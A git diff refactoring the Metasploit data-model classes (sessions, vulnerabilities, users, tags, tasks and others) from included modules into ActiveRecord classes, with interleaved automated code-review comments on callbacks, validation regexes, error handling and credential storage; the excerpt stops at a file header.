@@ -1,34 +1,49 @@ -module MetasploitDataModels::ActiveRecordModels::Note - def self.included(base) - base.class_eval{ - notes = base.arel_table +class Mdm::Note < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :note_count - belongs_to :service, :class_name => "Mdm::Service" - serialize :data, ::MetasploitDataModels::Base64Serializer.new + after_save :normalize - scope :flagged, where('critical = true AND seen = false') - scope :visible, where(notes[:ntype].not_in(['web.form', 'web.url', 'web.vuln'])) - scope :search, lambda { |*args| - where(["(data NOT ILIKE 'BAh7%' AND data LIKE ?)" + - "OR (data ILIKE 'BAh7%' AND decode(data, 'base64') LIKE ?)" + - "OR ntype ILIKE ?", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]) - } + # + # Relations + # + belongs_to :workspace, :class_name => "Mdm::Workspace" + belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :note_count + belongs_to :service, :class_name => "Mdm::Service" - after_save :normalize + # + # Scopes + # - private + scope :flagged, where('critical = true AND seen = false') - def normalize - if data_changed? and ntype =~ /fingerprint/ - host.normalize_os - end - end - } + notes = self.arel_table + scope :visible, where(notes[:ntype].not_in(['web.form', 'web.url', 'web.vuln'])) + + scope :search, lambda { |*args| + where(["(data NOT ILIKE 'BAh7%' AND data LIKE ?)" + + "OR (data ILIKE 'BAh7%' AND decode(data, 'base64') LIKE ?)" + + "OR ntype ILIKE ?", + "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" + ]) + } + + # + # Serializations + # + + serialize :data, ::MetasploitDataModels::Base64Serializer.new + + private + + def normalize + if data_changed? and ntype =~ /fingerprint/ + host.normalize_os + end end + + ActiveSupport.run_load_hooks(:mdm_note, self) end 
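Review bot: The `normalize` callback in Mdm::Note calls `host.normalize_os` without checking that the note has a host. The model also belongs to a workspace and a service, and this hunk shows no presence validation on `host`, so a fingerprint note saved without one would raise NoMethodError from inside `after_save`. A guard keeps the save path safe: `host.normalize_os if host && data_changed? && ntype =~ /fingerprint/`. Whether host-less fingerprint notes occur in practice is not visible from this hunk.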
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb index 3808701ce1..931ebf20af 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Profile - def self.included(base) - base.class_eval{ - serialize :settings, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::Profile < ActiveRecord::Base + # + # Serializations + # + serialize :settings, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_profile, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb index e253bbbe1e..f7b7465e4a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::Ref - def self.included(base) - base.class_eval{ - has_many :vulns, :through => :vulns_refs, :class_name => "Mdm::Vuln" - has_many :vulns_refs, :class_name => "Mdm::VulnRef" - } - end +class Mdm::Ref < ActiveRecord::Base + # + # Relations + # + + has_many :vulns_refs, :class_name => 'Mdm::VulnRef' + + # + # Through :vuln_refs + # + has_many :vulns, :class_name => 'Mdm::Vuln', :through => :vulns_refs + + ActiveSupport.run_load_hooks(:mdm_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb index 1dee83259b..4bfa39767c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb 
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb @@ -1,29 +1,50 @@ -module MetasploitDataModels::ActiveRecordModels::Report - def self.included(base) - base.class_eval { +class Mdm::Report < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - serialize :options, ::MetasploitDataModels::Base64Serializer.new + before_destroy :delete_file - validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/, :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true + # + # Relations + # - serialize :options, MetasploitDataModels::Base64Serializer.new + belongs_to :workspace, :class_name => 'Mdm::Workspace' - before_destroy :delete_file + # + # Scopes + # - scope :flagged, where('reports.downloaded_at is NULL') + scope :flagged, where('reports.downloaded_at is NULL') - private + # + # Serializations + # - def delete_file - c = Pro::Client.get rescue nil - if c - c.report_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end - } + serialize :options, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :name, + :format => { + :allow_blank => true, + :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", + :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/ + } + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.report_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_report, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb index 9d42c2d6a3..b50b88f13e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb 
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb @@ -1,22 +1,27 @@ -module MetasploitDataModels::ActiveRecordModels::ReportTemplate - def self.included(base) - base.class_eval{ +class Mdm::ReportTemplate < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" + before_destroy :delete_file - before_destroy :delete_file + # + # Relations + # - private + belongs_to :workspace, :class_name => 'Mdm::Workspace' - def delete_file - c = Pro::Client.get rescue nil - if c - c.report_template_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end - } + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.report_template_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_report_template, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb index a10a3f96a8..4d13ef2f17 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb @@ -1,7 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Route - def self.included(base) - base.class_eval{ - belongs_to :session, :class_name => "Mdm::Session" - } - end +class Mdm::Route < ActiveRecord::Base + # + # Relations + # + + belongs_to :session, :class_name => 'Mdm::Session' + + ActiveSupport.run_load_hooks(:mdm_route, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb index fb97bed99b..484555b38f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb 
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb 
@@ -1,42 +1,56 @@ -module MetasploitDataModels::ActiveRecordModels::Service - def self.included(base) - base.class_eval{ - eval("STATES = ['open', 'closed', 'filtered', 'unknown']") unless defined? STATES - has_many :vulns, :dependent => :destroy, :class_name => "Mdm::Vuln" - has_many :notes, :dependent => :destroy, :class_name => "Mdm::Note" - has_many :creds, :dependent => :destroy, :class_name => "Mdm::Cred" - has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost" - has_many :web_sites, :dependent => :destroy, :class_name => "Mdm::WebSite" - has_many :web_pages, :through => :web_sites, :class_name => "Mdm::WebPage" - has_many :web_forms, :through => :web_sites, :class_name => "Mdm::WebForm" - has_many :web_vulns, :through => :web_sites, :class_name => "Mdm::WebVuln" +class Mdm::Service < ActiveRecord::Base + # + # Callbacks + # - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :service_count + after_save :normalize_host_os - has_many :web_pages, :through => :web_sites - has_many :web_forms, :through => :web_sites - has_many :web_vulns, :through => :web_sites + # + # CONSTANTS + # - scope :inactive, where("services.state != 'open'") - scope :with_state, lambda { |a_state| where("services.state = ?", a_state)} - scope :search, lambda { |*args| - where([ - "services.name ILIKE ? OR " + - "services.info ILIKE ? OR " + - "services.proto ILIKE ? OR " + - "services.port = ? ", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", (args[0].to_i > 0) ? args[0].to_i : 99999 - ]) - } + STATES = ['open', 'closed', 'filtered', 'unknown'] - after_save :normalize_host_os + # + # Relations + # - def normalize_host_os - if info_changed? 
- host.normalize_os - end - end - } + has_many :creds, :dependent => :destroy, :class_name => 'Mdm::Cred' + has_many :exploited_hosts, :dependent => :destroy, :class_name => 'Mdm::ExploitedHost' + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :service_count + has_many :notes, :dependent => :destroy, :class_name => 'Mdm::Note' + has_many :vulns, :dependent => :destroy, :class_name => 'Mdm::Vuln' + has_many :web_sites, :dependent => :destroy, :class_name => 'Mdm::WebSite' + + # + # Through :web_sites + # + has_many :web_pages, :through => :web_sites, :class_name => 'Mdm::WebPage' + has_many :web_forms, :through => :web_sites, :class_name => 'Mdm::WebForm' + has_many :web_vulns, :through => :web_sites, :class_name => 'Mdm::WebVuln' + + # + # Scopes + # + + scope :inactive, where("services.state != 'open'") + scope :with_state, lambda { |a_state| where("services.state = ?", a_state)} + scope :search, lambda { |*args| + where([ + "services.name ILIKE ? OR " + + "services.info ILIKE ? OR " + + "services.proto ILIKE ? OR " + + "services.port = ? ", + "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", (args[0].to_i > 0) ? args[0].to_i : 99999 + ]) + } + + def normalize_host_os + if info_changed? + host.normalize_os + end end + + ActiveSupport.run_load_hooks(:mdm_service, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb index 1fa49e9778..7c13da2706 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb 
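Review bot: `normalize_host_os` in Mdm::Service is an `after_save` callback but is defined as a public method, whereas the equivalent callbacks in note.rb and session.rb sit under `private`. Unless something outside the model calls it directly (not visible here), I would add `private` above `def normalize_host_os`. The new `STATES` constant is also a mutable array; `STATES = ['open', 'closed', 'filtered', 'unknown'].freeze` prevents accidental modification by callers.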
@@ -1,33 +1,48 @@ -module MetasploitDataModels::ActiveRecordModels::Session - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host" +class Mdm::Session < ActiveRecord::Base + # + # Callbacks + # - has_one :workspace, :through => :host, :class_name => "Mdm::Workspace" + before_destroy :stop - has_many :events, :class_name => "Mdm::SessionEvent", :order => "created_at", :dependent => :delete_all - has_many :routes, :class_name => "Mdm::Route", :dependent => :delete_all + # + # Relations + # - scope :alive, where("closed_at IS NULL") - scope :dead, where("closed_at IS NOT NULL") - scope :upgradeable, where("closed_at IS NULL AND stype = 'shell' and platform ILIKE '%win%'") + has_many :events, :class_name => 'Mdm::SessionEvent', :order => 'created_at', :dependent => :delete_all + belongs_to :host, :class_name => 'Mdm::Host' + has_many :routes, :class_name => 'Mdm::Route', :dependent => :delete_all - serialize :datastore, ::MetasploitDataModels::Base64Serializer.new + # + # Through :host + # + has_one :workspace, :through => :host, :class_name => 'Mdm::Workspace' - before_destroy :stop - - def upgradeable? - (self.platform =~ /win/ and self.stype == 'shell') - end - + # + # Scopes + # - private + scope :alive, where('closed_at IS NULL') + scope :dead, where('closed_at IS NOT NULL') + scope :upgradeable, where("closed_at IS NULL AND stype = 'shell' and platform ILIKE '%win%'") - def stop - c = Pro::Client.get rescue nil - c.session_stop(self.local_id) rescue nil # ignore exceptions (XXX - ideally, stopped an already-stopped session wouldn't throw XMLRPCException) - end + # + # Serializations + # - } + serialize :datastore, ::MetasploitDataModels::Base64Serializer.new + + def upgradeable? 
+ (self.platform =~ /win/ and self.stype == 'shell') end + + private + + def stop + c = Pro::Client.get rescue nil + # ignore exceptions (XXX - ideally, stopped an already-stopped session wouldn't throw XMLRPCException) + c.session_stop(self.local_id) rescue nil + end + + ActiveSupport.run_load_hooks(:mdm_session, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb index 72f25d20b5..99cadd2243 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::SessionEvent - def self.included(base) - base.class_eval{ +class Mdm::SessionEvent < ActiveRecord::Base + # + # Relations + # - belongs_to :session, :class_name => "Mdm::Session" - } - end + belongs_to :session, :class_name => 'Mdm::Session' + + ActiveSupport.run_load_hooks(:mdm_session_event, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb index e87148f9b0..5f61c4da80 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb 
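Review bot: `stop` in Mdm::Session calls `c.session_stop(self.local_id) rescue nil` even when `Pro::Client.get` returned nil, relying on the rescue modifier to swallow the resulting NoMethodError. That blanket rescue also hides any genuine failure to stop a session, so a record can be destroyed while its session keeps running with nothing logged. I would return early with `return unless c` and rescue only the XML-RPC error the comment mentions.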
@@ -1,27 +1,46 @@ -module MetasploitDataModels::ActiveRecordModels::Tag - def self.included(base) - base.class_eval { - has_many :hosts_tags, :class_name => "Mdm::HostTag" - has_many :hosts, :through => :hosts_tags, :class_name => "Mdm::Host" +class Mdm::Tag < ActiveRecord::Base + # + # Callbacks + # - belongs_to :user, :class_name => "Mdm::User" + before_destroy :cleanup_hosts - validates :name, :presence => true, :format => { - :with => /^[A-Za-z0-9\x2e\x2d_]+$/, :message => "must be alphanumeric, dots, dashes, or underscores" - } - validates :desc, :length => {:maximum => 8191, :message => "desc must be less than 8k."} + # + # Relations + # - before_destroy :cleanup_hosts + has_many :hosts_tags, :class_name => 'Mdm::HostTag' + belongs_to :user, :class_name => 'Mdm::User' - def to_s - name - end + # + # Through :hosts_tags + # + has_many :hosts, :through => :hosts_tags, :class_name => 'Mdm::Host' - def cleanup_hosts - # Clean up association table records - Mdm::HostTag.delete_all("tag_id = #{self.id}") - end - - } + + # + # Validations + # + + validates :desc, + :length => { + :maximum => ((8 * (2 ** 10)) - 1), + :message => "desc must be less than 8k." + } + validates :name, + :format => { + :with => /^[A-Za-z0-9\x2e\x2d_]+$/, :message => "must be alphanumeric, dots, dashes, or underscores" + }, + :presence => true + + def cleanup_hosts + # Clean up association table records + Mdm::HostTag.delete_all("tag_id = #{self.id}") end + + def to_s + name + end + + ActiveSupport.run_load_hooks(:mdm_tag, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb index 57df49debf..7e63e9442d 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb 
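Review bot: The `:name` format validator in `Mdm::Tag` anchors with `^` and `$`, which in Ruby match at line boundaries, so a value whose first line is valid and is followed by a newline and arbitrary text still passes the "alphanumeric, dots, dashes, or underscores" check. Use string anchors instead: `:with => /\A[A-Za-z0-9\x2e\x2d_]+\z/`. In the same class, `cleanup_hosts` builds its condition by interpolation; `Mdm::HostTag.delete_all(['tag_id = ?', id])` keeps it parameterised, like the `:conditions` arrays used elsewhere in this commit.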
@@ -1,28 +1,41 @@ -module MetasploitDataModels::ActiveRecordModels::Task - def self.included(base) - base.class_eval{ +class Mdm::Task < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" + before_destroy :delete_file - serialize :options, ::MetasploitDataModels::Base64Serializer.new - serialize :result, ::MetasploitDataModels::Base64Serializer.new - serialize :settings, ::MetasploitDataModels::Base64Serializer.new + # + # Relations + # - scope :running, order( "created_at DESC" ).where("completed_at IS NULL") + belongs_to :workspace, :class_name => "Mdm::Workspace" - before_destroy :delete_file + # + # Scopes + # - private + scope :running, order( "created_at DESC" ).where("completed_at IS NULL") - def delete_file - c = Pro::Client.get rescue nil - if c - c.task_delete_log(self[:id]) if c - else - ::File.unlink(self.path) rescue nil - end - end - } + # + # Serializations + # + + serialize :options, MetasploitDataModels::Base64Serializer.new + serialize :result, MetasploitDataModels::Base64Serializer.new + serialize :settings, MetasploitDataModels::Base64Serializer.new + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.task_delete_log(self[:id]) if c + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_task, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb index 4c56892f87..bdc5baae21 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb 
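Review bot: `delete_file` hides every failure behind inline `rescue nil`, including the `::File.unlink(self.path)` fallback, so a log file that could not be removed looks the same as success; `Mdm::Session#stop` earlier in this commit follows the same pattern. The trailing `if c` on `c.task_delete_log(self[:id]) if c` is redundant inside the `if c` branch. Rescuing only the expected error, e.g. `rescue Errno::ENOENT`, and logging anything else would keep the best-effort behaviour without masking real faults. `path` comes from the record, and nothing visible here confines it to the task log directory, so it is worth confirming where it is set.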
@@ -1,23 +1,32 @@ -module MetasploitDataModels::ActiveRecordModels::User - def self.included(base) - base.class_eval { - extend MetasploitDataModels::SerializedPrefs - serialize :prefs, ::MetasploitDataModels::Base64Serializer.new +class Mdm::User < ActiveRecord::Base + extend MetasploitDataModels::SerializedPrefs - has_and_belongs_to_many :workspaces, :join_table => "workspace_members", :uniq => true, :class_name => "Mdm::Workspace" - has_many :owned_workspaces, :foreign_key => "owner_id", :class_name => "Mdm::Workspace" - has_many :tags, :class_name => "Mdm::Tag" + # + # Relations + # - validates :password, :password_is_strong => true - validates :password_confirmation, :password_is_strong => true - + has_many :owned_workspaces, :foreign_key => 'owner_id', :class_name => 'Mdm::Workspace' + has_many :tags, :class_name => 'Mdm::Tag' + has_and_belongs_to_many :workspaces, :join_table => 'workspace_members', :uniq => true, :class_name => 'Mdm::Workspace' - serialized_prefs_attr_accessor :nexpose_host, :nexpose_port, :nexpose_user, :nexpose_pass, :nexpose_creds_type, :nexpose_creds_user, :nexpose_creds_pass - serialized_prefs_attr_accessor :http_proxy_host, :http_proxy_port, :http_proxy_user, :http_proxy_pass - serialized_prefs_attr_accessor :time_zone, :session_key - serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with AuthLogic magic columns (which dont work for serialized fields) + # + # Serialziations + # - } - end + serialize :prefs, MetasploitDataModels::Base64Serializer.new + + serialized_prefs_attr_accessor :nexpose_host, :nexpose_port, :nexpose_user, :nexpose_pass, :nexpose_creds_type, :nexpose_creds_user, :nexpose_creds_pass + serialized_prefs_attr_accessor :http_proxy_host, :http_proxy_port, :http_proxy_user, :http_proxy_pass + serialized_prefs_attr_accessor :time_zone, :session_key + serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with 
AuthLogic magic columns (which dont work for serialized fields) + + # + # Validations + # + + validates :password, :password_is_strong => true + validates :password_confirmation, :password_is_strong => true + + ActiveSupport.run_load_hooks(:mdm_user, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb index d1e9c408c1..fbf1bdc20d 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb 
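Review bot: The section comment added above `serialize :prefs` is misspelled as `# Serialziations`; it should read `# Serializations` like the other models in this commit. The prefs accessors declared under it include `nexpose_pass`, `nexpose_creds_pass` and `http_proxy_pass`, and the serializer's name suggests the column is Base64-encoded rather than encrypted (its implementation is not in this hunk). A comment saying so, e.g. `# NOTE: prefs are encoded, not encrypted; the users table holds recoverable credentials`, would help anyone handling database dumps or backups.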
@@ -1,38 +1,60 @@ -module MetasploitDataModels::ActiveRecordModels::Vuln - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :vuln_count - belongs_to :service, :class_name => "Mdm::Service", :foreign_key => :service_id - has_many :vuln_details, :dependent => :destroy, :class_name => "Mdm::VulnDetail" - has_many :vuln_attempts, :dependent => :destroy, :class_name => "Mdm::VulnAttempt" - has_many :vulns_refs, :class_name => "Mdm::VulnRef" - has_many :refs, :through => :vulns_refs, :class_name => "Mdm::Ref" +class Mdm::Vuln < ActiveRecord::Base + # + # Callbacks + # + after_update :save_refs - validates :name, :presence => true - validates_associated :refs + # + # Relations + # - after_update :save_refs + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :vuln_count + belongs_to :service, :class_name => 'Mdm::Service', :foreign_key => :service_id + has_many :vuln_attempts, :dependent => :destroy, :class_name => 'Mdm::VulnAttempt' + has_many :vuln_details, :dependent => :destroy, :class_name => 'Mdm::VulnDetail' + has_many :vulns_refs, :class_name => 'Mdm::VulnRef' - scope :search, lambda { |*args| - where(["(vulns.name ILIKE ? or vulns.info ILIKE ? or refs.name ILIKE ?)", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]). - joins("LEFT OUTER JOIN vulns_refs ON vulns_refs.vuln_id=vulns.id LEFT OUTER JOIN refs ON refs.id=vulns_refs.ref_id") - } + # + # Through :vuln_refs + # + has_many :refs, :through => :vulns_refs, :class_name => 'Mdm::Ref' - private + # + # Scopes + # - def save_refs - refs.each { |ref| ref.save(:validate => false) } - end + scope :search, lambda { |*args| + where( + [ + '(vulns.name ILIKE ? or vulns.info ILIKE ? 
or refs.name ILIKE ?)', + "%#{args[0]}%", + "%#{args[0]}%", + "%#{args[0]}%" + ] + ).joins( + 'LEFT OUTER JOIN vulns_refs ON vulns_refs.vuln_id=vulns.id LEFT OUTER JOIN refs ON refs.id=vulns_refs.ref_id' + ) + } - def before_destroy - Mdm::VulnRef.delete_all('vuln_id = ?', self.id) - Mdm::VulnDetail.delete_all('vuln_id = ?', self.id) - Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id) - end + # + # Validations + # - } + validates :name, :presence => true + validates_associated :refs + + private + + def before_destroy + Mdm::VulnRef.delete_all('vuln_id = ?', self.id) + Mdm::VulnDetail.delete_all('vuln_id = ?', self.id) + Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id) end + + def save_refs + refs.each { |ref| ref.save(:validate => false) } + end + + ActiveSupport.run_load_hooks(:mdm_vuln, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb index 46a73890a8..7d258271d5 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb @@ -1,8 +1,15 @@ -module MetasploitDataModels::ActiveRecordModels::VulnAttempt - def self.included(base) - base.class_eval { - belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_attempt_count - validates :vuln_id, :presence => true - } - end +class Mdm::VulnAttempt < ActiveRecord::Base + # + # Relations + # + + belongs_to :vuln, :class_name => 'Mdm::Vuln', :counter_cache => :vuln_attempt_count + + # + # Validations + # + + validates :vuln_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_vuln_attempt, self) end 
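Review bot: `before_destroy` in `Mdm::Vuln` is defined as a private instance method instead of being registered with the callback macro, and each `delete_all('vuln_id = ?', self.id)` passes the bind value as a second positional argument rather than inside an array condition. As far as I know, ActiveRecord 3 no longer treats an overridden `before_destroy` method as a callback, so this cleanup probably never runs. `vuln_details` and `vuln_attempts` are already covered by `:dependent => :destroy`, but `vulns_refs` rows would be left behind. Declaring `has_many :vulns_refs, :dependent => :delete_all, :class_name => 'Mdm::VulnRef'` and dropping the method would cover that.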
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb index d3655e79cb..d0386728b4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::VulnDetail - def self.included(base) - base.class_eval { - belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_detail_count - validates :vuln_id, :presence => true - } - end +class Mdm::VulnDetail < ActiveRecord::Base + # + # Relations + # + belongs_to :vuln, :class_name => 'Mdm::Vuln', :counter_cache => :vuln_detail_count + + # + # Validations + # + + validates :vuln_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_vuln_detail, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb index 567ff44075..f11f9b62f0 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb @@ -1,10 +1,13 @@ -module MetasploitDataModels::ActiveRecordModels::VulnRef - def self.included(base) - base.class_eval { - base.table_name = "vulns_refs" - belongs_to :ref - belongs_to :vuln - } - end +class Mdm::VulnRef < ActiveRecord::Base + self.table_name = 'vulns_refs' + + # + # Relations + # + + belongs_to :ref, :class_name => 'Mdm::Ref' + belongs_to :vuln, :class_name => 'Mdm::Vuln' + + ActiveSupport.run_load_hooks(:mdm_vuln_ref, self) end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb index d0edb57101..5d8ac12ee6 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebForm - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :params, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebForm < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_form, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb index 601497ff47..538e2b0e60 100755 --- 